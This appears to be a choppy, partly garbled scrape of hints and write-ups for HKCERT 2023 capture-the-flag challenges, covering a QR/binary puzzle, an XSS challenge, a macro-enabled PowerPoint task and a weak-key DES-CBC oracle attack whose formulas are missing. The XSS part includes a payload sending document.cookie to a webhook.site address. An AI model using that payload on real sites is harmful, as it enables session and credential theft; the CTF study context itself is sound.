/flag1
will result in a QR Code,but it looks uneven
rx="0"
and rx="1"
, which are suspicious
01101000 01101011 ...
hkcert23{...
Answer:Binary ASCII Code
require
,module
,globalThis
are also src
query string parameter, because of the following:https://hcaptcha.com
,https://*.hcaptcha.com
or https://pastebin.com
:location='https://webhook.site/your_webhook_site_id/?cookie='+document.cookie
Content-Type
header of the embedded filetext/plain
in this case, which will not be executed as javascriptThis challenge is best viewed with .NET Framework
This is a pptm file, which is Macro Enabled. Make sure you check out the VBA code under the Developer tab.
https://support.microsoft.com/en-au/office/show-the-developer-tab-e1192344-5e56-4d45-931b-e5fd9bea2d45
Can't see source code? Try this
https://stackoverflow.com/questions/1026483/is-there-a-way-to-crack-the-password-on-an-excel-vba-project
Then there are many ways to solve, like changing the probability, rearrange the encrypted data, decrypt the encrypted data directly, etc. Good luck!
In this challenge, we are given an slightly modified Data Encryption Standard (denoted by DES'). Additionally, we are given the two oracles:
encrypt_flag
encrypts the flag using DES'-CBC.encrypt
encrypts an arbitrary message using DES'-CBC.The goal is to retrieve the flag using the above oracle calls.
With __left_rotations
being changed, all keys became weak keys. If we are using electronic codebook (ECB) mode of operation, , or intuitively, encrypting the same message twice would result in getting the message.
Figure 1.
However, in this case, we are using the CBC mode. This is how the a message is encrypted when we use encrypt_flag
(or encrypt
). At the very beginning, the message is padded to a size of multiple of 8. After that, it is chopped into blocks of 8 bytes:
Figure 2.
It is then encrypted to the ciphertext which is given to us. How can we make use of the "encrypting the ciphertext actually decrypts it" behaviour to recover ?
Let's show how we retrieve by encrypting :
Figure 3.
Since , the content we are passing to the encrypt function being . In Figure 2, we know . Now we can recover by computing .
Now decrypt the remaining blocks!